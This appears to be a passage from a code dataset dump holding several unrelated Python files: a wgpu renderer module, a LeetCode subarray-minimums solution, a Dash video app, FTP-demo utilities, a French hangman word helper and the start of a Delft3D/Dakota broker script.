array_from_shadertype(stdinfo_uniform_type), usage=\"uniform\"\n )\n\n # Get render function for this world object,\n # and use it to get a high-level description of pipelines.\n renderfunc = registry.get_render_function(wobject)\n\n # Call render function\n render_info = RenderInfo(stdinfo=wobject._wgpu_stdinfo_buffer)\n pipeline_infos = renderfunc(wobject, render_info)\n if pipeline_infos is not None:\n assert isinstance(pipeline_infos, list)\n assert all(\n isinstance(pipeline_info, dict) for pipeline_info in pipeline_infos\n )\n return pipeline_infos\n else:\n return None\n\n def _get_pipeline_objects(self, wobject):\n\n # Prepare the three kinds of pipelines that we can get\n compute_pipelines = []\n render_pipelines = []\n alt_render_pipelines = []\n\n # Process each pipeline info object, converting each to a more concrete dict\n for pipeline_info in wobject._wgpu_pipeline_infos:\n if \"vertex_shader\" in pipeline_info and \"fragment_shader\" in pipeline_info:\n pipeline = self._compose_render_pipeline(wobject, pipeline_info)\n if pipeline_info.get(\"target\", None) is None:\n render_pipelines.append(pipeline)\n else:\n raise NotImplementedError(\"Alternative render pipelines\")\n alt_render_pipelines.append(pipeline)\n elif \"compute_shader\" in pipeline_info:\n compute_pipelines.append(\n self._compose_compute_pipeline(wobject, pipeline_info)\n )\n else:\n raise ValueError(\n \"Did not find compute_shader nor vertex_shader+fragment_shader in pipeline info.\"\n )\n\n return {\n \"compute_pipelines\": compute_pipelines,\n \"render_pipelines\": render_pipelines,\n \"alt_render_pipelines\": alt_render_pipelines,\n \"stdinfo\": wobject._wgpu_stdinfo_buffer,\n }\n\n def _compose_compute_pipeline(self, wobject, pipeline_info):\n \"\"\" Given a high-level compute pipeline description, creates a\n lower-level representation that can be consumed by wgpu.\n \"\"\"\n\n # todo: cache the pipeline with the shader (and entrypoint) as a hash\n\n device = self._device\n\n # Convert indices to args for the compute_pass.dispatch() call\n indices = pipeline_info[\"indices\"]\n if not (\n isinstance(indices, tuple)\n and len(indices) == 3\n and all(isinstance(i, int) for i in indices)\n ):\n raise RuntimeError(\n f\"Compute indices must be 3-tuple of ints, not {indices}.\"\n )\n index_args = indices\n\n # Get bind groups and pipeline layout from the buffers in pipeline_info.\n # This also makes sure the buffers and textures are up-to-date.\n bind_groups, pipeline_layout = self._get_bind_groups(pipeline_info)\n\n # Compile shader and create pipeline object\n cshader = pipeline_info[\"compute_shader\"]\n cs_module = device.create_shader_module(code=cshader)\n compute_pipeline = device.create_compute_pipeline(\n layout=pipeline_layout,\n compute_stage={\"module\": cs_module, \"entry_point\": \"main\"},\n )\n\n return {\n \"pipeline\": compute_pipeline, # wgpu object\n \"index_args\": index_args, # tuple\n \"bind_groups\": bind_groups, # list of wgpu bind_group objects\n }\n\n def _compose_render_pipeline(self, wobject, pipeline_info):\n \"\"\" Given a high-level render pipeline description, creates a\n lower-level representation that can be consumed by wgpu.\n \"\"\"\n\n # todo: cache the pipeline with a lot of things as the hash\n # todo: cache vertex descriptors\n\n device = self._device\n\n # If an index buffer is present, update it, and get index_format.\n wgpu_index_buffer = None\n index_format = wgpu.IndexFormat.uint32\n index_buffer = pipeline_info.get(\"index_buffer\", None)\n if index_buffer is 
not None:\n wgpu_index_buffer = index_buffer._wgpu_buffer\n index_format = index_buffer.format\n\n # Convert and check high-level indices. Indices represent a range\n # of index id's, or define what indices in the index buffer are used.\n indices = pipeline_info.get(\"indices\", None)\n if indices is None:\n if index_buffer is None:\n raise RuntimeError(\"Need indices or index_buffer \")\n indices = range(index_buffer.data.size)\n # Convert to 2-element tuple (vertex, instance)\n if not isinstance(indices, tuple):\n indices = (indices,)\n if len(indices) == 1:\n indices = indices + (1,) # add instancing index\n if len(indices) != 2:\n raise RuntimeError(\"Render pipeline indices must be a 2-element tuple.\")\n\n # Convert indices to args for the render_pass.draw() or draw_indexed()\n # draw(count_vertex, count_instance, first_vertex, first_instance)\n # draw_indexed(count_v, count_i, first_vertex, base_vertex, first_instance)\n index_args = [0, 0, 0, 0]\n for i, index in enumerate(indices):\n if isinstance(index, int):\n index_args[i] = index\n elif isinstance(index, range):\n assert index.step == 1\n index_args[i] = index.stop - index.start\n index_args[i + 2] = index.start\n else:\n raise RuntimeError(\n \"Render pipeline indices must be a 2-element tuple with ints or ranges.\"\n )\n if wgpu_index_buffer is not None:\n base_vertex = 0 # A value added to each index before reading [...]\n index_args.insert(-1, base_vertex)\n\n # Process vertex buffers. Update the buffer, and produces a descriptor.\n vertex_buffers = []\n vertex_buffer_descriptors = []\n # todo: we can probably expose multiple attributes per buffer using a BufferView\n # todo: also, must vertex_buffers be a dict?\n # -> can we also leverage numpy here?\n for slot, buffer in enumerate(pipeline_info.get(\"vertex_buffers\", [])):\n vbo_des = {\n \"array_stride\": buffer.nbytes // buffer.nitems,\n \"stepmode\": wgpu.InputStepMode.vertex, # vertex or instance\n \"attributes\": [\n {\"format\": buffer.format, \"offset\": 0, \"shader_location\": slot,}\n ],\n }\n vertex_buffers.append(buffer)\n vertex_buffer_descriptors.append(vbo_des)\n\n # Get bind groups and pipeline layout from the buffers in pipeline_info.\n # This also makes sure the buffers and textures are up-to-date.\n bind_groups, pipeline_layout = self._get_bind_groups(pipeline_info)\n\n # Compile shaders\n vshader = pipeline_info[\"vertex_shader\"]\n fshader = pipeline_info[\"fragment_shader\"]\n vs_module = device.create_shader_module(code=vshader)\n fs_module = device.create_shader_module(code=fshader)\n\n # Instantiate the pipeline object\n pipeline = device.create_render_pipeline(\n layout=pipeline_layout,\n vertex_stage={\"module\": vs_module, \"entry_point\": \"main\"},\n fragment_stage={\"module\": fs_module, \"entry_point\": \"main\"},\n primitive_topology=pipeline_info[\"primitive_topology\"],\n rasterization_state={\n \"front_face\": wgpu.FrontFace.ccw,\n \"cull_mode\": wgpu.CullMode.none,\n \"depth_bias\": 0,\n \"depth_bias_slope_scale\": 0.0,\n \"depth_bias_clamp\": 0.0,\n },\n color_states=[\n {\n \"format\": wgpu.TextureFormat.bgra8unorm_srgb,\n \"alpha_blend\": (\n wgpu.BlendFactor.one,\n wgpu.BlendFactor.zero,\n wgpu.BlendOperation.add,\n ),\n \"color_blend\": (\n wgpu.BlendFactor.src_alpha,\n wgpu.BlendFactor.one_minus_src_alpha,\n wgpu.BlendOperation.add,\n ),\n \"write_mask\": wgpu.ColorWrite.ALL,\n }\n ],\n depth_stencil_state={\n \"format\": wgpu.TextureFormat.depth32float,\n \"depth_write_enabled\": True, # optional\n \"depth_compare\": 
wgpu.CompareFunction.less, # optional\n },\n vertex_state={\n \"index_format\": index_format,\n \"vertex_buffers\": vertex_buffer_descriptors,\n },\n sample_count=1,\n sample_mask=0xFFFFFFFF,\n alpha_to_coverage_enabled=False,\n )\n\n return {\n \"pipeline\": pipeline, # wgpu object\n \"index_args\": index_args, # tuple\n \"index_buffer\": wgpu_index_buffer, # BaseBuffer\n \"vertex_buffers\": vertex_buffers, # list of BaseBuffer\n \"bind_groups\": bind_groups, # list of wgpu bind_group objects\n }\n\n def _get_bind_groups(self, pipeline_info):\n \"\"\" Given high-level information on bindings, create the corresponding\n wgpu objects and make sure that all buffers and textures are up-to-date.\n Returns (bind_groups, pipeline_layout).\n \"\"\"\n # todo: cache bind_group_layout objects\n # todo: cache pipeline_layout objects\n # todo: can perhaps be more specific about visibility\n\n device = self._device\n\n # Collect resource groups (keys e.g. \"bindings1\", \"bindings132\")\n resource_groups = []\n for key in pipeline_info.keys():\n if key.startswith(\"bindings\"):\n i = int(key[len(\"bindings\") :])\n assert i >= 0\n while len(resource_groups) <= i:\n resource_groups.append({})\n resource_groups[i] = pipeline_info[key]\n\n # Create bind groups and bind group layouts\n bind_groups = []\n bind_group_layouts = []\n for resources in resource_groups:\n if not isinstance(resources, dict):\n resources = {slot: resource for slot, resource in enumerate(resources)}\n # Collect list of dicts\n bindings = []\n binding_layouts = []\n for slot, type_resource in resources.items():\n assert isinstance(type_resource, tuple) and len(type_resource) == 2\n binding_type, resource = type_resource\n\n if binding_type in (\n wgpu.BindingType.uniform_buffer,\n wgpu.BindingType.storage_buffer,\n wgpu.BindingType.readonly_storage_buffer,\n ):\n # A buffer resource\n assert isinstance(resource, BaseBuffer)\n bindings.append(\n {\n \"binding\": slot,\n \"resource\": {\n \"buffer\": resource._wgpu_buffer,\n \"offset\": 0,\n \"size\": resource.nbytes,\n },\n }\n )\n binding_layouts.append(\n {\n \"binding\": slot,\n \"visibility\": visibility_all,\n \"type\": binding_type,\n \"has_dynamic_offset\": False,\n }\n )\n\n elif binding_type in (\n wgpu.BindingType.sampled_texture,\n wgpu.BindingType.readonly_storage_texture,\n wgpu.BindingType.writeonly_storage_texture,\n ):\n # A texture view resource\n assert isinstance(resource, TextureView)\n bindings.append(\n {\"binding\": slot, \"resource\": resource._wgpu_texture_view,}\n )\n visibility = visibility_all\n if binding_type == wgpu.BindingType.sampled_texture:\n visibility = wgpu.ShaderStage.FRAGMENT\n fmt = resource.format\n dim = resource.view_dim\n component_type = wgpu.TextureComponentType.sint\n if \"uint\" in fmt:\n component_type = wgpu.TextureComponentType.uint\n if \"float\" in fmt or \"norm\" in fmt:\n component_type = wgpu.TextureComponentType.float\n binding_layout = {\n \"binding\": slot,\n \"visibility\": visibility,\n \"type\": binding_type,\n \"view_dimension\": getattr(wgpu.TextureViewDimension, dim, dim),\n \"texture_component_type\": component_type,\n # \"multisampled\": False,\n }\n if \"storage\" in binding_type:\n binding_layout[\"storage_texture_format\"] = fmt\n binding_layouts.append(binding_layout)\n\n elif binding_type in (\n wgpu.BindingType.sampler,\n wgpu.BindingType.comparison_sampler,\n ):\n # A sampler resource\n assert isinstance(resource, TextureView)\n bindings.append(\n {\"binding\": slot, \"resource\": resource._wgpu_sampler,}\n )\n 
binding_layouts.append(\n {\n \"binding\": slot,\n \"visibility\": wgpu.ShaderStage.FRAGMENT,\n \"type\": binding_type,\n }\n )\n\n # Create wgpu objects\n bind_group_layout = device.create_bind_group_layout(entries=binding_layouts)\n bind_group = device.create_bind_group(\n layout=bind_group_layout, entries=bindings\n )\n bind_groups.append(bind_group)\n bind_group_layouts.append(bind_group_layout)\n\n # Create pipeline layout object from list of layouts\n pipeline_layout = device.create_pipeline_layout(\n bind_group_layouts=bind_group_layouts\n )\n\n return bind_groups, pipeline_layout\n\n def _update_buffer(self, resource):\n buffer = getattr(resource, \"_wgpu_buffer\", None)\n if not (buffer is None or resource.dirty):\n return\n\n # todo: dispose an old buffer? / reuse an old buffer?\n\n pending_uploads = resource._pending_uploads\n resource._pending_uploads = []\n\n # Create buffer if needed\n if buffer is None or buffer.size != resource.nbytes:\n usage = wgpu.BufferUsage.COPY_DST\n for u in resource.usage.split(\"|\"):\n usage |= getattr(wgpu.BufferUsage, u)\n buffer = self._device.create_buffer(size=resource.nbytes, usage=usage)\n\n # Upload any pending data\n for offset, size in pending_uploads:\n bytes_per_item = resource.nbytes // resource.nitems\n boffset, bsize = bytes_per_item * offset, bytes_per_item * size\n sub_buffer = self._device.create_buffer_mapped(\n size=bsize, usage=wgpu.BufferUsage.COPY_SRC,\n )\n resource._renderer_copy_data_to_ctypes_object(\n sub_buffer.mapping, offset, size\n )\n sub_buffer.unmap()\n command_encoder = self._device.create_command_encoder()\n command_encoder.copy_buffer_to_buffer(sub_buffer, 0, buffer, boffset, bsize)\n self._device.default_queue.submit([command_encoder.finish()])\n resource._wgpu_buffer = buffer\n\n def _update_texture_view(self, resource):\n if getattr(resource, \"_wgpu_texture_view\", None) is None:\n if resource._is_default_view:\n texture_view = resource.texture._wgpu_texture.create_view()\n else:\n dim = resource._dim\n assert resource._mip_range.step == 1\n assert resource._layer_range.step == 1\n texture_view = resource.texture._wgpu_texture.create_view(\n format=resource._format,\n dimension=f\"{dim}d\" if isinstance(dim, int) else dim,\n aspect=resource._aspect,\n base_mip_level=resource._mip_range.start,\n mip_level_count=len(resource._mip_range),\n base_array_layer=resource._layer_range.start,\n array_layer_count=len(resource._layer_range),\n )\n resource._wgpu_texture_view = texture_view\n\n def _update_texture(self, resource):\n if not resource.dirty:\n return\n\n texture = getattr(resource, \"_wgpu_texture\", None)\n pending_uploads = resource._pending_uploads\n resource._pending_uploads = []\n\n # Create texture if needed\n if texture is None: # todo: or needs to be replaced (e.g. 
resized)\n usage = wgpu.TextureUsage.COPY_DST\n for u in resource.usage.split(\"|\"):\n usage |= getattr(wgpu.TextureUsage, u)\n texture = self._device.create_texture(\n size=resource.size,\n usage=usage,\n dimension=f\"{resource.dim}d\",\n format=getattr(wgpu.TextureFormat, resource.format),\n mip_level_count=1,\n sample_count=1,\n ) # todo: let resource specify mip_level_count and sample_count\n\n # Upload any pending data\n for offset, size in pending_uploads:\n bytes_per_pixel = resource.nbytes // (\n resource.size[0] * resource.size[1] * resource.size[2]\n )\n nbytes = bytes_per_pixel * size[0] * size[1] * size[2]\n sub_buffer = self._device.create_buffer_mapped(\n size=nbytes, usage=wgpu.BufferUsage.COPY_SRC,\n )\n resource._renderer_copy_data_to_ctypes_object(\n sub_buffer.mapping, offset, size\n )\n sub_buffer.unmap()\n command_encoder = self._device.create_command_encoder()\n command_encoder.copy_buffer_to_texture(\n {\n \"buffer\": sub_buffer,\n \"offset\": 0,\n \"bytes_per_row\": size[0] * bytes_per_pixel,\n \"rows_per_image\": size[1],\n },\n {\n \"texture\": texture,\n \"mip_level\": 0,\n \"array_layer\": 0,\n \"origin\": offset,\n },\n copy_size=size,\n )\n self._device.default_queue.submit([command_encoder.finish()])\n resource._wgpu_texture = texture\n\n def _update_sampler(self, resource):\n # A sampler's info (and raw object) are stored on a TextureView\n if getattr(resource, \"_wgpu_sampler\", None) is None:\n amodes = resource._address_mode.replace(\",\", \" \").split() or [\"clamp\"]\n while len(amodes) < 3:\n amodes.append(amodes[-1])\n filters = resource._filter.replace(\",\", \" \").split() or [\"nearest\"]\n while len(filters) < 3:\n filters.append(filters[-1])\n ammap = {\"clamp\": \"clamp-to-edge\", \"mirror\": \"mirror-repeat\"}\n sampler = self._device.create_sampler(\n address_mode_u=ammap.get(amodes[0], amodes[0]),\n address_mode_v=ammap.get(amodes[1], amodes[1]),\n address_mode_w=ammap.get(amodes[2], amodes[2]),\n mag_filter=filters[0],\n min_filter=filters[1],\n mipmap_filter=filters[2],\n # lod_min_clamp -> use default 0\n # lod_max_clamp -> use default inf\n # compare -> only not-None for comparison samplers!\n )\n resource._wgpu_sampler = sampler\n","sub_path":"visvis2/renderers/wgpu/_wgpurenderer.py","file_name":"_wgpurenderer.py","file_ext":"py","file_size_in_byte":31971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"653216586","text":"\"\"\"\n# 907. Sum of Subarray Minimums\n\n# Given an array of integers A, find the sum of min(B), where B ranges over every (contiguous) subarray of A.\n\n# Since the answer may be large, return the answer modulo 10^9 + 7.\n\n\n# Example 1:\n\n# Input: [3,1,2,4]\n# Output: 17\n# Explanation: Subarrays are [3], [1], [2], [4], [3,1], [1,2], [2,4], [3,1,2], [1,2,4], [3,1,2,4].\n# Minimums are 3, 1, 2, 4, 1, 1, 2, 1, 1, 1. Sum is 17.\n\n\n# Note:\n\n# 1 <= A.length <= 30000\n# 1 <= A[i] <= 30000\n\n\"\"\"\n\n\nclass SumSubarrayMins:\n\n \"\"\"\n Approach 1: Prev/Next Array\n Intuition\n\n Let's try to count the number of subarrays #(j) for which A[j] is the right-most minimum. 
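\n    (Worked numbers for the example above, A = [3,1,2,4]: the right-most-minimum counts come out to #(0)=1, #(1)=6, #(2)=2, #(3)=1, giving 1*3 + 6*1 + 2*2 + 1*4 = 17.)\n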
Then, the answer will be sum #(j) * A[j].\n (We must say right-most so that we form disjoint sets of subarrays and do not double count any, as the minimum of an array may not be unique.)\n\n This in turn brings us the question of knowing the smallest index i <= j for which A[i], A[i+1], ..., A[j] are all >= A[j];\n and the largest index k >= j for which A[j+1], A[j+2], ..., A[k] are all > A[j].\n\n Algorithm\n\n For example, if A = [10, 3, 4, 5, _3_, 2, 3, 10] and we would like to know #(j = 4) [the count of the second 3, which is marked], we would find i = 1 and k = 5.\n\n From there, the actual count is #(j) = (j - i + 1) * (k - j + 1), as there are j - i + 1 choices i, i+1, ..., j for the left index of the subarray,\n and k - j + 1 choices j, j+1, ..., k for the right index of the subarray.\n\n Answering these queries (ie. determining (i, k) given j) is a classic problem that can be answered with a stack.\n We'll focus on the problem of finding i: the problem of finding k is similar.\n\n Making a Prev Array\n\n The idea is to maintain stack, a monotone decreasing subsequence of A (actually, indices of A in implementation).\n These represent candidate boundaries i* - 1 for the next query, stored in increasing order of A[i*].\n\n Now considering j in increasing order, we can remove candidates for which A[i*] <= A[j] in decreasing order of i*.\n\n For example, if A = [10, 5, 3, 7, 0, 4, 5, 2, 1, _8_], then when considering j = 9 (A[j] = 8),\n we have a stack of boundaries like [-1, 0, 3, 6] (representing A[i*] = -inf, 10, 7, 5). We pop 6 and 3 from the stack,\n as 5 <= 8 and 7 <= 8, and we get the answer boundary i* - 1 = 0.\n\n Note that this process is linear, since we do a linear amount of pushes and pops of the stack in total.\n\n This is quite difficult to figure out, but this type of technique occurs often in many other problems, so it is worth learning in detail.\n\n Complexity Analysis\n\n Time Complexity: O(N), where NN is the length of A.\n\n Space Complexity: O(N).\n \"\"\"\n def doit_stack(self, A):\n MOD = 10**9 + 7\n N = len(A)\n\n # prev has i* - 1 in increasing order of A[i* - 1]\n # where i* is the answer to query j\n stack = []\n prev = [None] * N\n for i in range(N):\n while stack and A[i] <= A[stack[-1]]:\n stack.pop()\n prev[i] = stack[-1] if stack else -1\n stack.append(i)\n\n # next has k* + 1 in increasing order of A[k* + 1]\n # where k* is the answer to query j\n stack = []\n next_ = [None] * N\n for k in range(N-1, -1, -1):\n while stack and A[k] < A[stack[-1]]:\n stack.pop()\n next_[k] = stack[-1] if stack else N\n stack.append(k)\n\n # Use prev/next array to count answer\n return sum((i - prev[i]) * (next_[i] - i) * A[i] for i in range(N)) % MOD\n\n def doit_stack1(self, A):\n ans, st, n, hMod = 0, [], len(A), 10 ** 9 + 7\n\n for i in range(n + 1):\n while st and A[st[-1]] > (0 if i == n else A[i]):\n j = st.pop()\n k = st[-1] if st else -1\n ans = (ans + A[j] * (i - j) * (j - k)) % hMod\n st.append(i)\n return ans\n\n # (DP) O(n^2) O(TLE)\n def doit_dp_tle(self, A):\n N = len(A)\n dp = [[A[i] if i == j else float('inf') for j in range(N)] for i in range(N)]\n\n ans = 0\n for i in range(N):\n for s in range(1, N - i):\n j = i + s\n dp[i][j] = min(dp[i][j-1], A[j])\n ans += dp[i][j]\n\n return (ans + sum(dp[i][i] for i in range(N))) % (10**9 + 7)\n\n \"\"\"\n Approach 2: Maintain Stack of Minimums\n Intuition\n\n For a specific j, let's try to count the minimum of each subarray [i, j]. 
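\n    (For instance, with A = [3,1,2,4] and j = 3, those minimums are B = [1, 1, 2, 4], and their sum 8 is this j's contribution to the final answer.)\n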
The intuition is that as we increment j++, these minimums may be related to each other.\n    Indeed, min(A[i:j+1]) = min(A[i:j], A[j]).\n\n    Playing with some array like A = [1,7,5,2,4,3,9], with j = 6 the minimum of each subarray [i, j] is B = [1,2,2,2,3,3,9].\n    We can see that there are critical points i = 0, i = 3, i = 5, i = 6 where a minimum is reached for the first time when walking left from j.\n\n    Algorithm\n    Let's try to maintain an RLE (run length encoding) of these critical points B.\n    More specifically, for the above (A, j), we will maintain stack = [(val=1, count=1), (val=2, count=3), (val=3, count=2), (val=9, count=1)],\n    that represents a run length encoding of the subarray minimums B = [1,2,2,2,3,3,9]. For each j, we want sum(B).\n\n    As we increment j, we will have to update this stack to include the newest element (val=x, count=1).\n    We need to pop off all values >= x before, as the minimum of the associated subarray [i, j] will now be A[j] instead of what it was before.\n\n    At the end, the answer is the dot product of this stack: ∑ e.val ∗ e.count (e ∈ stack), which we also maintain on the side as the variable dot.\n\n    Complexity Analysis\n\n    Time Complexity: O(N), where N is the length of A.\n    Space Complexity: O(N).\n\n    \"\"\"\n    def doit_stack_rle(self, A):\n        stack = []\n        ans = dot = 0\n\n        for c in A:\n            # Add all answers for subarrays [i, j], i <= j\n            count = 1\n            while stack and stack[-1][0] >= c:\n                v, cnt = stack.pop()\n                count += cnt\n                dot -= v * cnt\n\n            stack.append((c, count))\n            dot += c * count\n            ans += dot\n\n        return ans % (10**9 + 7)\n\n    def doit(self, A):\n        res = 0\n        stack = [] # non-decreasing\n        A = [float('-inf')] + A + [float('-inf')]\n        for i, n in enumerate(A):\n            while stack and A[stack[-1]] > n:\n                cur = stack.pop()\n                res += A[cur] * (i - cur) * (cur - stack[-1])\n            stack.append(i)\n\n        return res % (10**9 + 7)\n\n\nif __name__ == '__main__':\n\n    res = SumSubarrayMins().doit([3, 1, 2, 4])\n\n    pass\n","sub_path":"PythonLeetcode/leetcodeM/907_SumOfSubarrayMinimums.py","file_name":"907_SumOfSubarrayMinimums.py","file_ext":"py","file_size_in_byte":6676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"259418074","text":"import dash\nfrom dash.dependencies import Input, Output\nimport dash_core_components as dcc\nimport dash_html_components as html\n\n\napp = dash.Dash()\napp.layout = html.Div([\n    html.Div(id='target'),\n    dcc.Dropdown(\n        id='dropdown',\n        options=[\n            {'label': 'Video 1', 'value': 'video1'},\n            {'label': 'Video 2', 'value': 'video2'},\n            {'label': 'Video 3', 'value': 'video3'},\n        ],\n        value='video1'\n    )\n])\n\n\n@app.callback(Output('target', 'children'), [Input('dropdown', 'value')])\ndef embed_iframe(value):\n    videos = {\n        'video1': 'sea2K4AuPOk',\n        'video2': '5BAthiN0htc',\n        'video3': 'e4ti2fCpXMI',\n    }\n    return html.Iframe(src=f'https://www.youtube.com/embed/{videos[value]}')\n\nif __name__ == '__main__':\n    app.run_server(debug=True)","sub_path":"appTest.py","file_name":"appTest.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"447510710","text":"import os\nimport time\nimport sys\nimport hashlib,hmac,json,struct\nimport configparser\nfrom conf import settings\n\nclass Config_hander:\n\n    @classmethod\n    def getConfig(self,section,key):\n        config = configparser.ConfigParser()\n        path = settings.MARGS_DIR\n        config.read(path)\n        return config.get(section,key)\n    @classmethod\n
    def modConfig(self,section,key,value):\n        config = configparser.ConfigParser()\n        path = settings.MARGS_DIR\n        config.read(path)\n        config.set(section,key,value)\n        config.write(open(path, \"w\"))\n\n    @classmethod\n    def getuserinfo(self, section, key):\n        config = configparser.ConfigParser()\n        path = settings.USERINFO\n        config.read(path)\n        return config.get(section, key)\n\n\n\n\n# aa = Config_hander.getConfig('processbar','width')\n# print(aa)\n# bb = Config_hander.modConfig('processbar','width','100')\n\n\n\nclass Processbar:\n    '''### progress bar ###'''\n    width = int(Config_hander.getConfig('processbar','width'))\n    @classmethod\n    def process(self,percent):\n        if percent >=1:\n            percent = 1\n        showpro = '[%%-%ds]'%self.width% (int(self.width*percent)*'#')\n        print('\\r%s %d%%'%(showpro,int(percent*100)),file=sys.stdout,flush=True,end='')\n\n\nclass Md5_salt:\n    '''md5 with salt'''\n    secret_key = Config_hander.getConfig('md5_salt','secretkey')\n    @classmethod\n    def file_md5(self,file):\n        m=hmac.new(self.secret_key.encode('utf-8'))\n\n        with open(file,'rb') as f:\n            for line in f:\n                #print(line)\n                m.update(line)\n        return m.hexdigest()\n\n    @classmethod\n    def msg_md5(self,msg):\n        m = hmac.new(self.secret_key.encode('utf-8'))\n        m.update(msg)\n        return m.hexdigest()\n\n# aa = Md5_salt.file_md5('E:/pycharn/socket_train/FTP_demo/src/model_client.py')\n# print(aa)\n# bb = Md5_salt.msg_md5('aaaaaa')\n# print(bb)\n\nclass Make_header:\n    @classmethod\n    def makeheader(self,fsize,filename,md5):\n        dic_head = {'total_size': fsize, 'file_name': filename, 'md5': md5}\n        rr = json.dumps(dic_head)\n\n        head_bytes = bytes(rr.encode('utf-8'))\n\n        msg0 = struct.pack('i', len(head_bytes))\n        msg1 = head_bytes\n        msg_list = [msg0, msg1]\n        return msg_list\n\n    @classmethod\n    def auth_header(self, fsize, username,passwd):\n        dic_head = {'total_size': fsize, 'username': username,'passwd':passwd}\n        rr = json.dumps(dic_head)\n\n        head_bytes = bytes(rr.encode('utf-8'))\n\n        msg0 = struct.pack('i', len(head_bytes))\n        msg1 = head_bytes\n        msg_list = [msg0, msg1]\n        return msg_list\n\n    @classmethod\n    def msgheader(self, fsize):\n        dic_head = {'total_size': fsize}\n        rr = json.dumps(dic_head)\n\n        head_bytes = bytes(rr.encode('utf-8'))\n\n        msg0 = struct.pack('i', len(head_bytes))\n        msg1 = head_bytes\n        msg_list = [msg0, msg1]\n        return msg_list\n\nclass Timer:\n\n    @classmethod\n    def circle(cls,t):\n        dot = 'connecting .'\n        while t > 0:\n            dot = dot + '.'\n            time.sleep(0.6)\n            print('\\r',dot,file=sys.stdout,flush=True,end='')\n            t -=2\n\n\n\n\n\n\n","sub_path":"lib/comm.py","file_name":"comm.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"646137588","text":"\"\"\"\n    IPSA IN21 TP2: the hangman game\n    This module uses a GNU-licensed dictionary file of French words\n    retrieved from: http://www.winedt.org/Dict/\n    The word definitions are taken from the cnrtl.fr website\n    IPSA - BONNEFOI - 2017\n\"\"\"\n\ndef motAléatoire():\n    \"\"\" returns a word drawn at random from a dictionary file\n    the dictionary used is open source, from the winedt website\n    \"\"\"\n    import random\n    location = \"fr_utf8.dic\"\n    FDico = open(location,'r',encoding='utf-8') # open the file\n    #total_lignes = sum(1 for line in FDico) # number of lines in the file\n    #FDico.seek(0)\n    total_lignes = 338989\n    num_mot_alea = random.randrange(0, total_lignes)# random line number\n    mot = FDico.readlines()[num_mot_alea] # read the randomly chosen line\n    mot = mot[:-1] # strip the trailing 'newline' character\n    return mot\n
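\n# Usage sketch (illustrative, mirroring the __main__ block at the bottom of this file):\n#   mot = motAléatoire()\n#   print(mot)\n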
\ndef getWebDefinition(mot):\n    \"\"\"\n    returns the list of elements containing the definitions\n    of the word passed as a parameter\n    the definitions are obtained by making an HTTP\n    request to the cnrtl site.\n\n    \"\"\"\n    import urllib.request # to make web requests\n    import urllib.parse # imported explicitly; urllib.parse.quote is used below\n    import xml.etree.ElementTree as ET # web page parsing\n    import html # to convert the html results to unicode\n\n    url = \"http://www.cnrtl.fr/definition/\" # start of the address\n    url = url+urllib.parse.quote(mot) # word with special characters converted to ascii/HTTP\n    a=urllib.request.urlopen(url) # web request\n    #str1 = a.readall() # read the response; in python 3.5 use read()\n    str1 = a.read() # python 3.5: read the response with read()\n    tree = ET.fromstring(html.unescape(str1.decode())) # build the XML tree\n    defi = tree.findall(\"*//{http://www.w3.org/1999/xhtml}span[@class='tlf_cdefinition']\") # collect the span tags with attribute class=...\n    return defi\n\ndef printOneDef(mot):\n    print(\"definition from the CNRTL: http://www.cnrtl.fr/definition/\")\n    deff = getWebDefinition(mot)\n    print(deff[0].text)\n\ndef printAllDef(mot):\n    print(\"definitions from the CNRTL: http://www.cnrtl.fr/definition/\")\n    deff = getWebDefinition(mot)\n    for d in deff:\n        print(\"-\",d.text) \n\ndef getAllDef(mot):\n    deff = getWebDefinition(mot)\n    L=list()\n    for d in deff:\n        L.append(d.text)\n    return L\n\ndef getAllDefStr(mot):\n    deff = getWebDefinition(mot)\n    S=''\n    for d in deff:\n        S = S+(d.text)+\"\\n\"\n    return S\n\nif __name__ == '__main__':\n    mot = motAléatoire()\n    print(mot)\n    printAllDef(mot)\n\n","sub_path":"libpendu.py","file_name":"libpendu.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"438928290","text":"#! /usr/bin/env python\n# Brokers communication between Delft3D and Dakota through files.\n# Mark Piper (mark.piper@colorado.edu)\n\nimport sys\nimport os\nimport shutil\nfrom subprocess import call\n\ndef main():\n    '''\n    Brokers communication between Delft3D and Dakota through files.\n    '''\n    start_dir = os.path.dirname(os.path.realpath(__file__))\n    initialize_dir = os.path.join(start_dir, 'initialize')\n    input_template = 'WLD.sed.template'\n    input_file = 'WLD.sed'\n    fake_file = 'fake.out'\n    real_file = 'results.out'\n\n    # Copy the contents of the initialize directory into the current\n    # run directory. (Don't use shutil.copytree because the\n    # destination directory exists.)\n    for f in os.listdir(initialize_dir):\n        shutil.copy(os.path.join(initialize_dir, f), os.getcwd())\n\n    # Use the parsing utility `dprepro` (from $DAKOTA_DIR/bin) to\n    # substitute the parameters from Dakota into the input template,\n    # creating a new Delft3D input file.\n    shutil.copy(os.path.join(start_dir, input_template), os.getcwd())\n    call(['dprepro', sys.argv[1], input_template, input_file])\n\n
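    # An illustrative rendering of the call above: dprepro <dakota_params_file> WLD.sed.template WLD.sed,\n    # where the params file path arrives in sys.argv[1] from Dakota.\n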
